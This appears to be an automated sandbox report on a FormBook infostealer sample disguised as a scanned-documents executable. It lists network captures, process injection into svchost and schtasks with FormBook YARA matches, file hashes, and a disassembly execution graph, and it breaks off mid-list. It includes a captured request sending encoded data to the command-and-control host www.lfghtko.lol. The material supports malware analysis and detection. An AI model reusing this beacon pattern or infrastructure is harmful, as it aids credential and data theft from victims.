                                                    Data Ascii: efM=LugYlboQcaRDj9KEiHyYu1md8sySbXASUzg66kizd/yEwKvpX1qIJHP1lXQDD48mysiowHz2xqylg//5ogRTgblOkhEonYXHfCPWCjtj74+rFVw1NkuEFHxDqyk4P5adgI6SXIC7CMJV5FUJNLKuKmVi8HqW72AzE3mmY/QbltaobntdL/xVfJH0VMPQd1QmXnpGQtmW2ozR64fz5pdyTs/NrGPgn414xuReZgNBjjQFVbzmox0O34hnMXIV16sPmzzhgtE6nrZuGJH0P68KGkSOT4xVMIBRWKKTAhbGw6O3GOLGrbeLMPNIV+lBVh33/80E8SizwUahYgQo8hkR7pqblWNJN6Z6osRid8JCFiv/AvVlyDPw6nxXPmtcR9agnW4D/YzixDyb6mvxiAreonU9/Q1M6O8w+izBpP93oygGGaHT1E0731v1Y1PkN1azMzXsbS3NMnQHT+d+S7Mq4QkPE7C8HTQEhhH3wu8Mtfg0RkYzyQs7Iwg8XjoI0SCUfu4kTDglo6H/XVUEEawAFTWF63eSgD7lQUDFHX81x0bx5isjJD4hg0wa/RFL2W6HftaFy7OiYDIRhvmtKwm2NmrUKj6KUX8sXsQ2QFvzm3aOStKdZL2YrvWgNkjcModhcfu8JspZL31E2sIwLV0/n74LcCI37tZk6Dj1hbxKoNocZAfZkO+rzlQL+cFAcrJ+Jxj8MfVP49Wb8tv/Kgs9BESWSYezc2nk/Xt3zwEEW2yr/1lFx4Lezb19Z0paBYJ5y+GSYQ01mK+1eInwOzS5cMSZuG14/AfToHYMGwMzy/1lH+aRvP0CNJxq/uWXt3OKJbLaaGGK9fODDzHvWe45JMqNocdEG02+aETwN/N1s4jl9hnqhB6qFpGmFKJAM45VjG6g3QdSd01G4H68TZclX7znGdvd5slVt+N3i7N4BfGHfO5e3Xd8C4WsTs1HNg5CQAVLeJvBtWw13ZWPNVBDKJsRXa2xtejNRcNWp0XqMbyVx+vP [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    48192.168.2.455446116.213.43.19080
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:34:42.658773899 CEST436OUTGET /yxos/?efM=GsI4mtIQVr1bqd+V/1qEiGWG2JWSdng8JQsV9k25RNexwN7KNHOmJ2uIpR4VD7Ui+v6cwkDz1p2XqdzqrAR32o8KijRXgfnfSTbVFHsQqIz2A3ZpJ0HUFH4=&GTP=uhqpjxIPh HTTP/1.1
                                                    Host: www.lfghtko.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:09:30:32
                                                    Start date:05/08/2024
                                                    Path:C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"
                                                    Imagebase:0x280000
                                                    File size:1'261'056 bytes
                                                    MD5 hash:75D0BFD0499F3BB0C94A45A80E92476B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    General

                                                    Target ID:1
                                                    Start time:09:30:33
                                                    Start date:05/08/2024
                                                    Path:C:\Windows\SysWOW64\svchost.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe"
                                                    Imagebase:0xc90000
                                                    File size:46'504 bytes
                                                    MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1950883710.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1951519783.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1951562901.0000000004990000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:3
                                                    Start time:09:30:54
                                                    Start date:05/08/2024
                                                    Path:C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe"
                                                    Imagebase:0x210000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4111935021.0000000003C90000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:4
                                                    Start time:09:30:56
                                                    Start date:05/08/2024
                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\schtasks.exe"
                                                    Imagebase:0x7b0000
                                                    File size:187'904 bytes
                                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4110797200.0000000002B10000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4111043032.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4111848670.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:7
                                                    Start time:09:31:09
                                                    Start date:05/08/2024
                                                    Path:C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe"
                                                    Imagebase:0x210000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4113899205.0000000004AE0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    General

                                                    Target ID:8
                                                    Start time:09:31:21
                                                    Start date:05/08/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff6bf500000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:3.3%
                                                      Dynamic/Decrypted Code Coverage:0.9%
                                                      Signature Coverage:4.6%
                                                      Total number of Nodes:1995
                                                      Total number of Limit Nodes:50
                                                      execution_graph 94913 281cad SystemParametersInfoW 94914 2b8402 94919 2b81be 94914->94919 94917 2b842a 94922 2b81ef try_get_first_available_module 94919->94922 94921 2b83ee 94938 2b27ec 26 API calls __fread_nolock 94921->94938 94930 2b8338 94922->94930 94934 2a8e0b 40 API calls 2 library calls 94922->94934 94924 2b8343 94924->94917 94931 2c0984 94924->94931 94926 2b838c 94926->94930 94935 2a8e0b 40 API calls 2 library calls 94926->94935 94928 2b83ab 94928->94930 94936 2a8e0b 40 API calls 2 library calls 94928->94936 94930->94924 94937 2af2d9 20 API calls __dosmaperr 94930->94937 94939 2c0081 94931->94939 94933 2c099f 94933->94917 94934->94926 94935->94928 94936->94930 94937->94921 94938->94924 94942 2c008d BuildCatchObjectHelperInternal 94939->94942 94940 2c009b 94996 2af2d9 20 API calls __dosmaperr 94940->94996 94942->94940 94944 2c00d4 94942->94944 94943 2c00a0 94997 2b27ec 26 API calls __fread_nolock 94943->94997 94950 2c065b 94944->94950 94949 2c00aa __fread_nolock 94949->94933 94951 2c0678 94950->94951 94952 2c068d 94951->94952 94953 2c06a6 94951->94953 95013 2af2c6 20 API calls __dosmaperr 94952->95013 94999 2b5221 94953->94999 94956 2c06ab 94958 2c06cb 94956->94958 94959 2c06b4 94956->94959 94957 2c0692 95014 2af2d9 20 API calls __dosmaperr 94957->95014 95012 2c039a CreateFileW 94958->95012 95015 2af2c6 20 API calls __dosmaperr 94959->95015 94963 2c06b9 95016 2af2d9 20 API calls __dosmaperr 94963->95016 94965 2c0781 GetFileType 94966 2c078c GetLastError 94965->94966 94967 2c07d3 94965->94967 95019 2af2a3 20 API calls __dosmaperr 94966->95019 95021 2b516a 21 API calls 2 library calls 94967->95021 94968 2c0756 GetLastError 95018 2af2a3 20 API calls __dosmaperr 94968->95018 94969 2c0704 94969->94965 94969->94968 95017 2c039a CreateFileW 94969->95017 94973 2c079a CloseHandle 94973->94957 94976 2c07c3 94973->94976 94975 2c0749 94975->94965 94975->94968 95020 2af2d9 20 API calls __dosmaperr 94976->95020 94978 2c07f4 94979 2c0840 94978->94979 95022 2c05ab 72 API calls 3 library calls 94978->95022 94984 2c086d 94979->94984 95023 2c014d 72 API calls 4 library calls 94979->95023 94980 2c07c8 94980->94957 94983 2c0866 94983->94984 94985 2c087e 94983->94985 95024 2b86ae 94984->95024 94987 2c00f8 94985->94987 94988 2c08fc CloseHandle 94985->94988 94998 2c0121 LeaveCriticalSection __wsopen_s 94987->94998 95039 2c039a CreateFileW 94988->95039 94990 2c0927 94991 2c0931 GetLastError 94990->94991 94992 2c095d 94990->94992 95040 2af2a3 20 API calls __dosmaperr 94991->95040 94992->94987 94994 2c093d 95041 2b5333 21 API calls 2 library calls 94994->95041 94996->94943 94997->94949 94998->94949 95000 2b522d BuildCatchObjectHelperInternal 94999->95000 95042 2b2f5e EnterCriticalSection 95000->95042 95002 2b527b 95043 2b532a 95002->95043 95003 2b5259 95046 2b5000 95003->95046 95004 2b5234 95004->95002 95004->95003 95009 2b52c7 EnterCriticalSection 95004->95009 95007 2b52a4 __fread_nolock 95007->94956 95009->95002 95010 2b52d4 LeaveCriticalSection 95009->95010 95010->95004 95012->94969 95013->94957 95014->94987 95015->94963 95016->94957 95017->94975 95018->94957 95019->94973 95020->94980 95021->94978 95022->94979 95023->94983 95072 2b53c4 95024->95072 95026 2b86c4 95085 2b5333 21 API calls 2 library calls 95026->95085 95028 2b86be 95028->95026 95030 2b53c4 __wsopen_s 26 API calls 95028->95030 95038 2b86f6 95028->95038 95029 2b871c 95037 2b873e 95029->95037 95086 2af2a3 20 API calls __dosmaperr 95029->95086 95032 2b86ed 95030->95032 95031 2b53c4 __wsopen_s 26 API calls 95033 2b8702 FindCloseChangeNotification 95031->95033 95035 2b53c4 __wsopen_s 26 API calls 95032->95035 95033->95026 95036 2b870e GetLastError 95033->95036 95035->95038 95036->95026 95037->94987 95038->95026 95038->95031 95039->94990 95040->94994 95041->94992 95042->95004 95054 2b2fa6 LeaveCriticalSection 95043->95054 95045 2b5331 95045->95007 95055 2b4c7d 95046->95055 95048 2b5012 95052 2b501f 95048->95052 95062 2b3405 11 API calls 2 library calls 95048->95062 95050 2b5071 95050->95002 95053 2b5147 EnterCriticalSection 95050->95053 95063 2b29c8 95052->95063 95053->95002 95054->95045 95061 2b4c8a BuildCatchObjectHelperInternal 95055->95061 95056 2b4cca 95070 2af2d9 20 API calls __dosmaperr 95056->95070 95057 2b4cb5 RtlAllocateHeap 95059 2b4cc8 95057->95059 95057->95061 95059->95048 95061->95056 95061->95057 95069 2a4ead 7 API calls 2 library calls 95061->95069 95062->95048 95064 2b29d3 RtlFreeHeap 95063->95064 95065 2b29fc __dosmaperr 95063->95065 95064->95065 95066 2b29e8 95064->95066 95065->95050 95071 2af2d9 20 API calls __dosmaperr 95066->95071 95068 2b29ee GetLastError 95068->95065 95069->95061 95070->95059 95071->95068 95073 2b53d1 95072->95073 95077 2b53e6 95072->95077 95087 2af2c6 20 API calls __dosmaperr 95073->95087 95076 2b53d6 95088 2af2d9 20 API calls __dosmaperr 95076->95088 95080 2b540b 95077->95080 95089 2af2c6 20 API calls __dosmaperr 95077->95089 95078 2b5416 95090 2af2d9 20 API calls __dosmaperr 95078->95090 95080->95028 95082 2b53de 95082->95028 95083 2b541e 95091 2b27ec 26 API calls __fread_nolock 95083->95091 95085->95029 95086->95037 95087->95076 95088->95082 95089->95078 95090->95083 95091->95082 95092 2c2ba5 95093 2c2baf 95092->95093 95094 282b25 95092->95094 95135 283a5a 95093->95135 95120 282b83 7 API calls 95094->95120 95098 2c2bb8 95142 289cb3 95098->95142 95101 282b2f 95110 282b44 95101->95110 95124 283837 95101->95124 95102 2c2bc6 95103 2c2bce 95102->95103 95104 2c2bf5 95102->95104 95148 2833c6 95103->95148 95107 2833c6 22 API calls 95104->95107 95118 2c2bf1 GetForegroundWindow ShellExecuteW 95107->95118 95111 282b5f 95110->95111 95134 2830f2 Shell_NotifyIconW ___scrt_fastfail 95110->95134 95116 282b66 SetCurrentDirectoryW 95111->95116 95115 2833c6 22 API calls 95115->95118 95119 282b7a 95116->95119 95117 2c2c26 95117->95111 95118->95117 95166 282cd4 7 API calls 95120->95166 95122 282b2a 95123 282c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 95122->95123 95123->95101 95125 283862 ___scrt_fastfail 95124->95125 95167 284212 95125->95167 95128 2838e8 95130 2c3386 Shell_NotifyIconW 95128->95130 95131 283906 Shell_NotifyIconW 95128->95131 95171 283923 95131->95171 95133 28391c 95133->95110 95134->95111 95261 2c1f50 95135->95261 95138 289cb3 22 API calls 95139 283a8d 95138->95139 95263 283aa2 95139->95263 95141 283a97 95141->95098 95143 289cc2 _wcslen 95142->95143 95144 29fe0b 22 API calls 95143->95144 95145 289cea __fread_nolock 95144->95145 95146 29fddb 22 API calls 95145->95146 95147 289d00 95146->95147 95147->95102 95149 2833dd 95148->95149 95150 2c30bb 95148->95150 95283 2833ee 95149->95283 95152 29fddb 22 API calls 95150->95152 95154 2c30c5 _wcslen 95152->95154 95153 2833e8 95157 286350 95153->95157 95155 29fe0b 22 API calls 95154->95155 95156 2c30fe __fread_nolock 95155->95156 95158 286362 95157->95158 95159 2c4a51 95157->95159 95298 286373 95158->95298 95308 284a88 22 API calls __fread_nolock 95159->95308 95162 28636e 95162->95115 95163 2c4a5b 95164 2c4a67 95163->95164 95165 28a8c7 22 API calls 95163->95165 95165->95164 95166->95122 95168 2c35a4 95167->95168 95169 2838b7 95167->95169 95168->95169 95170 2c35ad DestroyIcon 95168->95170 95169->95128 95193 2ec874 42 API calls _strftime 95169->95193 95170->95169 95172 28393f 95171->95172 95191 283a13 95171->95191 95194 286270 95172->95194 95175 28395a 95199 286b57 95175->95199 95176 2c3393 LoadStringW 95178 2c33ad 95176->95178 95186 283994 ___scrt_fastfail 95178->95186 95211 28a8c7 95178->95211 95179 28396f 95180 28397c 95179->95180 95181 2c33c9 95179->95181 95180->95178 95183 283986 95180->95183 95184 286350 22 API calls 95181->95184 95185 286350 22 API calls 95183->95185 95187 2c33d7 95184->95187 95185->95186 95189 2839f9 Shell_NotifyIconW 95186->95189 95187->95186 95188 2833c6 22 API calls 95187->95188 95190 2c33f9 95188->95190 95189->95191 95192 2833c6 22 API calls 95190->95192 95191->95133 95192->95186 95193->95128 95215 29fe0b 95194->95215 95196 286295 95225 29fddb 95196->95225 95198 28394d 95198->95175 95198->95176 95200 2c4ba1 95199->95200 95201 286b67 _wcslen 95199->95201 95251 2893b2 95200->95251 95204 286b7d 95201->95204 95205 286ba2 95201->95205 95203 2c4baa 95203->95203 95250 286f34 22 API calls 95204->95250 95206 29fddb 22 API calls 95205->95206 95209 286bae 95206->95209 95208 286b85 __fread_nolock 95208->95179 95210 29fe0b 22 API calls 95209->95210 95210->95208 95212 28a8db 95211->95212 95214 28a8ea __fread_nolock 95211->95214 95213 29fe0b 22 API calls 95212->95213 95212->95214 95213->95214 95214->95186 95217 29fddb 95215->95217 95218 29fdfa 95217->95218 95221 29fdfc 95217->95221 95235 2aea0c 95217->95235 95242 2a4ead 7 API calls 2 library calls 95217->95242 95218->95196 95220 2a066d 95244 2a32a4 RaiseException 95220->95244 95221->95220 95243 2a32a4 RaiseException 95221->95243 95224 2a068a 95224->95196 95228 29fde0 95225->95228 95226 2aea0c ___std_exception_copy 21 API calls 95226->95228 95227 29fdfa 95227->95198 95228->95226 95228->95227 95230 29fdfc 95228->95230 95247 2a4ead 7 API calls 2 library calls 95228->95247 95234 2a066d 95230->95234 95248 2a32a4 RaiseException 95230->95248 95233 2a068a 95233->95198 95249 2a32a4 RaiseException 95234->95249 95237 2b3820 BuildCatchObjectHelperInternal 95235->95237 95236 2b385e 95246 2af2d9 20 API calls __dosmaperr 95236->95246 95237->95236 95238 2b3849 RtlAllocateHeap 95237->95238 95245 2a4ead 7 API calls 2 library calls 95237->95245 95238->95237 95240 2b385c 95238->95240 95240->95217 95242->95217 95243->95220 95244->95224 95245->95237 95246->95240 95247->95228 95248->95234 95249->95233 95250->95208 95252 2893c9 __fread_nolock 95251->95252 95253 2893c0 95251->95253 95252->95203 95253->95252 95255 28aec9 95253->95255 95256 28aedc 95255->95256 95260 28aed9 __fread_nolock 95255->95260 95257 29fddb 22 API calls 95256->95257 95258 28aee7 95257->95258 95259 29fe0b 22 API calls 95258->95259 95259->95260 95260->95252 95262 283a67 GetModuleFileNameW 95261->95262 95262->95138 95264 2c1f50 __wsopen_s 95263->95264 95265 283aaf GetFullPathNameW 95264->95265 95266 283ae9 95265->95266 95267 283ace 95265->95267 95277 28a6c3 95266->95277 95268 286b57 22 API calls 95267->95268 95270 283ada 95268->95270 95273 2837a0 95270->95273 95274 2837ae 95273->95274 95275 2893b2 22 API calls 95274->95275 95276 2837c2 95275->95276 95276->95141 95278 28a6dd 95277->95278 95279 28a6d0 95277->95279 95280 29fddb 22 API calls 95278->95280 95279->95270 95281 28a6e7 95280->95281 95282 29fe0b 22 API calls 95281->95282 95282->95279 95284 2833fe _wcslen 95283->95284 95285 2c311d 95284->95285 95286 283411 95284->95286 95287 29fddb 22 API calls 95285->95287 95293 28a587 95286->95293 95289 2c3127 95287->95289 95291 29fe0b 22 API calls 95289->95291 95290 28341e __fread_nolock 95290->95153 95292 2c3157 __fread_nolock 95291->95292 95294 28a59d 95293->95294 95297 28a598 __fread_nolock 95293->95297 95295 2cf80f 95294->95295 95296 29fe0b 22 API calls 95294->95296 95296->95297 95297->95290 95299 286382 95298->95299 95304 2863b6 __fread_nolock 95298->95304 95300 2c4a82 95299->95300 95301 2863a9 95299->95301 95299->95304 95303 29fddb 22 API calls 95300->95303 95302 28a587 22 API calls 95301->95302 95302->95304 95305 2c4a91 95303->95305 95304->95162 95306 29fe0b 22 API calls 95305->95306 95307 2c4ac5 __fread_nolock 95306->95307 95308->95163 95309 282de3 95310 282df0 __wsopen_s 95309->95310 95311 282e09 95310->95311 95312 2c2c2b ___scrt_fastfail 95310->95312 95313 283aa2 23 API calls 95311->95313 95315 2c2c47 GetOpenFileNameW 95312->95315 95314 282e12 95313->95314 95325 282da5 95314->95325 95317 2c2c96 95315->95317 95319 286b57 22 API calls 95317->95319 95320 2c2cab 95319->95320 95320->95320 95322 282e27 95343 2844a8 95322->95343 95326 2c1f50 __wsopen_s 95325->95326 95327 282db2 GetLongPathNameW 95326->95327 95328 286b57 22 API calls 95327->95328 95329 282dda 95328->95329 95330 283598 95329->95330 95373 28a961 95330->95373 95333 283aa2 23 API calls 95334 2835b5 95333->95334 95335 2c32eb 95334->95335 95336 2835c0 95334->95336 95341 2c330d 95335->95341 95390 29ce60 41 API calls 95335->95390 95378 28515f 95336->95378 95342 2835df 95342->95322 95391 284ecb 95343->95391 95346 2c3833 95413 2f2cf9 95346->95413 95347 284ecb 94 API calls 95349 2844e1 95347->95349 95349->95346 95351 2844e9 95349->95351 95350 2c3848 95352 2c384c 95350->95352 95353 2c3869 95350->95353 95355 2c3854 95351->95355 95356 2844f5 95351->95356 95463 284f39 95352->95463 95354 29fe0b 22 API calls 95353->95354 95372 2c38ae 95354->95372 95469 2eda5a 82 API calls 95355->95469 95462 28940c 136 API calls 2 library calls 95356->95462 95360 2c3862 95360->95353 95361 282e31 95362 2c3a5f 95367 2c3a67 95362->95367 95363 284f39 68 API calls 95363->95367 95367->95363 95471 2e989b 82 API calls __wsopen_s 95367->95471 95369 289cb3 22 API calls 95369->95372 95372->95362 95372->95367 95372->95369 95439 2e967e 95372->95439 95442 2f0b5a 95372->95442 95448 28a4a1 95372->95448 95456 283ff7 95372->95456 95470 2e95ad 42 API calls _wcslen 95372->95470 95374 29fe0b 22 API calls 95373->95374 95375 28a976 95374->95375 95376 29fddb 22 API calls 95375->95376 95377 2835aa 95376->95377 95377->95333 95379 28516e 95378->95379 95383 28518f __fread_nolock 95378->95383 95382 29fe0b 22 API calls 95379->95382 95380 29fddb 22 API calls 95381 2835cc 95380->95381 95384 2835f3 95381->95384 95382->95383 95383->95380 95385 283605 95384->95385 95389 283624 __fread_nolock 95384->95389 95387 29fe0b 22 API calls 95385->95387 95386 29fddb 22 API calls 95388 28363b 95386->95388 95387->95389 95388->95342 95389->95386 95390->95335 95472 284e90 LoadLibraryA 95391->95472 95396 2c3ccf 95399 284f39 68 API calls 95396->95399 95397 284ef6 LoadLibraryExW 95480 284e59 LoadLibraryA 95397->95480 95401 2c3cd6 95399->95401 95403 284e59 3 API calls 95401->95403 95406 2c3cde 95403->95406 95404 284f20 95405 284f2c 95404->95405 95404->95406 95408 284f39 68 API calls 95405->95408 95502 2850f5 95406->95502 95410 2844cd 95408->95410 95410->95346 95410->95347 95412 2c3d05 95414 2f2d15 95413->95414 95415 28511f 64 API calls 95414->95415 95416 2f2d29 95415->95416 95757 2f2e66 95416->95757 95419 2850f5 40 API calls 95420 2f2d56 95419->95420 95421 2850f5 40 API calls 95420->95421 95422 2f2d66 95421->95422 95423 2850f5 40 API calls 95422->95423 95424 2f2d81 95423->95424 95425 2850f5 40 API calls 95424->95425 95426 2f2d9c 95425->95426 95427 28511f 64 API calls 95426->95427 95428 2f2db3 95427->95428 95429 2aea0c ___std_exception_copy 21 API calls 95428->95429 95430 2f2dba 95429->95430 95431 2aea0c ___std_exception_copy 21 API calls 95430->95431 95432 2f2dc4 95431->95432 95433 2850f5 40 API calls 95432->95433 95434 2f2dd8 95433->95434 95435 2f28fe 27 API calls 95434->95435 95436 2f2dee 95435->95436 95437 2f2d3f 95436->95437 95763 2f22ce 95436->95763 95437->95350 95440 29fe0b 22 API calls 95439->95440 95441 2e96ae __fread_nolock 95440->95441 95441->95372 95443 2f0b65 95442->95443 95444 29fddb 22 API calls 95443->95444 95445 2f0b7c 95444->95445 95446 289cb3 22 API calls 95445->95446 95447 2f0b87 95446->95447 95447->95372 95449 28a52b 95448->95449 95455 28a4b1 __fread_nolock 95448->95455 95451 29fe0b 22 API calls 95449->95451 95450 29fddb 22 API calls 95452 28a4b8 95450->95452 95451->95455 95453 29fddb 22 API calls 95452->95453 95454 28a4d6 95452->95454 95453->95454 95454->95372 95455->95450 95457 28400a 95456->95457 95459 2840ae 95456->95459 95458 29fe0b 22 API calls 95457->95458 95461 28403c 95457->95461 95458->95461 95459->95372 95460 29fddb 22 API calls 95460->95461 95461->95459 95461->95460 95462->95361 95464 284f43 95463->95464 95466 284f4a 95463->95466 95465 2ae678 67 API calls 95464->95465 95465->95466 95467 284f59 95466->95467 95468 284f6a FreeLibrary 95466->95468 95467->95355 95468->95467 95469->95360 95470->95372 95471->95367 95473 284ea8 GetProcAddress 95472->95473 95474 284ec6 95472->95474 95475 284eb8 95473->95475 95477 2ae5eb 95474->95477 95475->95474 95476 284ebf FreeLibrary 95475->95476 95476->95474 95510 2ae52a 95477->95510 95479 284eea 95479->95396 95479->95397 95481 284e8d 95480->95481 95482 284e6e GetProcAddress 95480->95482 95485 284f80 95481->95485 95483 284e7e 95482->95483 95483->95481 95484 284e86 FreeLibrary 95483->95484 95484->95481 95486 29fe0b 22 API calls 95485->95486 95487 284f95 95486->95487 95562 285722 95487->95562 95489 284fa1 __fread_nolock 95490 2c3d1d 95489->95490 95491 2850a5 95489->95491 95501 284fdc 95489->95501 95576 2f304d 74 API calls 95490->95576 95565 2842a2 CreateStreamOnHGlobal 95491->95565 95494 2c3d22 95496 28511f 64 API calls 95494->95496 95495 2850f5 40 API calls 95495->95501 95497 2c3d45 95496->95497 95498 2850f5 40 API calls 95497->95498 95499 28506e messages 95498->95499 95499->95404 95501->95494 95501->95495 95501->95499 95571 28511f 95501->95571 95503 285107 95502->95503 95506 2c3d70 95502->95506 95598 2ae8c4 95503->95598 95507 2f28fe 95740 2f274e 95507->95740 95509 2f2919 95509->95412 95512 2ae536 BuildCatchObjectHelperInternal 95510->95512 95511 2ae544 95535 2af2d9 20 API calls __dosmaperr 95511->95535 95512->95511 95514 2ae574 95512->95514 95516 2ae579 95514->95516 95517 2ae586 95514->95517 95515 2ae549 95536 2b27ec 26 API calls __fread_nolock 95515->95536 95537 2af2d9 20 API calls __dosmaperr 95516->95537 95527 2b8061 95517->95527 95521 2ae58f 95522 2ae5a2 95521->95522 95523 2ae595 95521->95523 95539 2ae5d4 LeaveCriticalSection __fread_nolock 95522->95539 95538 2af2d9 20 API calls __dosmaperr 95523->95538 95524 2ae554 __fread_nolock 95524->95479 95528 2b806d BuildCatchObjectHelperInternal 95527->95528 95540 2b2f5e EnterCriticalSection 95528->95540 95530 2b807b 95541 2b80fb 95530->95541 95534 2b80ac __fread_nolock 95534->95521 95535->95515 95536->95524 95537->95524 95538->95524 95539->95524 95540->95530 95542 2b811e 95541->95542 95543 2b8177 95542->95543 95550 2b8088 95542->95550 95557 2a918d EnterCriticalSection 95542->95557 95558 2a91a1 LeaveCriticalSection 95542->95558 95544 2b4c7d BuildCatchObjectHelperInternal 20 API calls 95543->95544 95545 2b8180 95544->95545 95547 2b29c8 _free 20 API calls 95545->95547 95548 2b8189 95547->95548 95548->95550 95559 2b3405 11 API calls 2 library calls 95548->95559 95554 2b80b7 95550->95554 95551 2b81a8 95560 2a918d EnterCriticalSection 95551->95560 95561 2b2fa6 LeaveCriticalSection 95554->95561 95556 2b80be 95556->95534 95557->95542 95558->95542 95559->95551 95560->95550 95561->95556 95563 29fddb 22 API calls 95562->95563 95564 285734 95563->95564 95564->95489 95566 2842bc FindResourceExW 95565->95566 95570 2842d9 95565->95570 95567 2c35ba LoadResource 95566->95567 95566->95570 95568 2c35cf SizeofResource 95567->95568 95567->95570 95569 2c35e3 LockResource 95568->95569 95568->95570 95569->95570 95570->95501 95572 28512e 95571->95572 95573 2c3d90 95571->95573 95577 2aece3 95572->95577 95576->95494 95580 2aeaaa 95577->95580 95579 28513c 95579->95501 95584 2aeab6 BuildCatchObjectHelperInternal 95580->95584 95581 2aeac2 95593 2af2d9 20 API calls __dosmaperr 95581->95593 95583 2aeae8 95595 2a918d 